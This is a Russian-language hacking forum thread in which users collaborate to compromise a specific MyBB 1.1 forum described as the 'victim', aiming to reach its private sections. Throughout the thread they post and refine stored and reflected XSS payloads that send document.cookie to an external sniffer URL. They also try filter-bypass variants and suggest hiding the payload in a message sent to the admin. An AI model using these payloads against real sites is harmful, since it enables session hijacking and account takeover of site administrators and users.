Уязвимость движка MyBB

Discussion in 'Песочница' started by Romaxa55, 3 Jul 2006.

  1. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Всем привет, парни нужна помощ, такая ситуация, есть один форум, который имеет приватные разделы, переюзал множество сплоитов, в версии форума еще не уверен, в админке пишет MyBB 1.1, может ктонить чтонить посоветует, может инъекции есть? Ну вовсем кидайте сюда все, буду очень признателен. Если есть такие кто может помоч мне в деле, то стукните в асю (858476) там и спишемся.
     
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Возможно админ умный и прикрыл все дыры. Вот и сплойты не работают, а может руки такие.
     
  3. Hao Asakura

    Hao Asakura New Member

    Joined:
    23 Jun 2006
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Если это на рухелпе то там дырки закрыты.
    По крайней мере на ipb 1.3 final сплойт не сработал.
     
  4. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Парни, ну не эжто мы так просто сдадимся??? Ведь не уязвимых движков не существует. Форум американских юзеров. Поэтому врядли что либо они делали, вндь юзер по безопасности поставил бы аундификацую на админку, а там так просто все стоит, да и юзеров зарегино не много, кинтьсе линк на рабочии сплоиты (а то обычно с ошибками пишутся) буду очень признателен. Боюсь оставить линк жертвы, если кто может посмотреть, то кину в пм.
     
  5. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    О да, парни я это сделал, хсс прокатило, вот сам код есди кому интересно
    [*code][*email=a"onmousemove="*alert(document.cookie);"[email protected]]Нажми сюда![*/email][*/code]
    (Без *)
     
  6. Hao Asakura

    Hao Asakura New Member

    Joined:
    23 Jun 2006
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Неуязвимых движков нет.

    Ты линк дай на форум.
     
  7. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Линк я тебе отправил в ПМ
    ----------------------------------------------------------------------
    Люди теперь я сдаюсь, сплоит
    Code:
    [*code][*email=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![*/email][*/code]
    работает (естественно без звездочек) а вот под сниффер чтоб работал мозгов не хватает, нужна срочно помощь (плизззз)
     
    #7 Romaxa55, 3 Jul 2006
    Last edited: 3 Jul 2006
  8. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Code:
    [*code][*email=a"onmousemove="img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"[email protected]]Нажми сюда![*/email][*/code]
    Поробуй так ))) Если у тебя код рабочий )))
     
    #8 bul.666, 3 Jul 2006
    Last edited by a moderator: 3 Jul 2006
  9. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Пробовал, там еще нужно <script> закодировать, но на ковычки фильтр стоит, вот думаю как их обнануть
    Сплоит
    Code:
    [*code][*email=a"onmousemove="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>;"[email protected]]sex[*/email][*/code]
    
    Исходник.
    Code:
    "><a href="mailto:a"onmousemove="&lt;script&gt;img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;&lt;/script&gt;;"[email protected]">sex</a></div><br />
    Как вижу фильтр стоит на ковычки <> вот терь такой вопрос, как можно обойти фильтр на ковычки?
     
    #9 Romaxa55, 3 Jul 2006
    Last edited by a moderator: 3 Jul 2006
  10. Cheburek

    Cheburek New Member

    Joined:
    22 May 2006
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    для активного хавтило бы только этого
    Code:
    [*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"[email protected]]sex[*/email][*/code]
    будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
    но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:
    Code:
    [*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`[email protected]]sex[*/email][*/code]
     
    #10 Cheburek, 3 Jul 2006
    Last edited by a moderator: 3 Jul 2006
  11. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Хммм что то всеравно не то, получаю такой исходник
    Code:
    >[c ode][e mail=a&quot;style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+(document.cookie);this.sss=null`[email protected] ]sex[/e mail][/c ode]</textarea>
    Не могу понять, почему код алерта работает
    [c ode][e mail=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![/e mail][/c ode]
    Хотя на выходи я вижу вот что:
    <a href="mailto:a"onmousemove="alert(document.cookie);"[email protected]">Нажми сюда!</a></div><br />
    Чтож такое, люди, может кто знает?
     
    #11 Romaxa55, 3 Jul 2006
    Last edited: 3 Jul 2006
  12. Cheburek

    Cheburek New Member

    Joined:
    22 May 2006
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Romaxa55, кинь в пм ссылку на сайт? А активный xss тоже не сраотал? Странно....
     
  13. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Вот что у меня заработало, межсайтовый скиптинг но какз наете не совсем удобно его юзать админ не так уж глуп чтоб юзать линки незнакомые. Хотеловсь бы что нить с бб кодами, но выше приведеные советы не помогли, везде чтонить да фильтруется. Может можно вставить код который при наведение мыши не алер вылетал а окрытие страницы происходило?? Вот пример сплоитов:

    Code:
    http://forum.host/member.php?action=do_login&username=(Login]&password={pass}&url=">%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
    Code:
    http://forum.host/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Eimg%20=%20new%20Image();%20img.src%20=%20"%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65;%3C/script%3E&preview=Preview
    [mod]Убедительная просьба ко всем: Вместо тэга
     
    #13 Romaxa55, 3 Jul 2006
    Last edited by a moderator: 3 Jul 2006
  14. Cheburek

    Cheburek New Member

    Joined:
    22 May 2006
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    я з@#$%^ся его подбирать.... вот пассивный xss ...
    HTML:
    [*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"[email protected]]Нажми сюда![/email*][/code*]
    добавлено позже:
    можно в style добавить style=visibility:hidden; и написать админу вообще левую телегу ... он даже и не подумает что в сообщений может быть что-то потенциально опасное...
     
    #14 Cheburek, 3 Jul 2006
    Last edited: 3 Jul 2006
  15. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Хочу выразить огромную благодарность Cheburek'у!!!
    И давайте подвидем итоги по уязвимости MyBB v1.10

    Рабочие XSS:
    с Алертом
    Code:
    [code*][email=a"onmousemove="alert(document.cookie);"[email protected]]Нажми сюда![/email*][/code*]
    Со сниффером:
    Code:
    [*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"[email protected]]Нажми сюда![/emai*l][*/code]
    P.S. При использывании кода необходимо убрать звездочки!


    Тема может быть закрыта!
     
  16. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
    Не работают эти эксплойты, так как стоит фильтрация на ковычки и Bb коды
     
Loading...
Similar Threads - Уязвимость движка MyBB
  1. zase
    Replies:
    1
    Views:
    3,547
  2. avva99on
    Replies:
    0
    Views:
    2,415
  3. Shadows_God
    Replies:
    14
    Views:
    8,063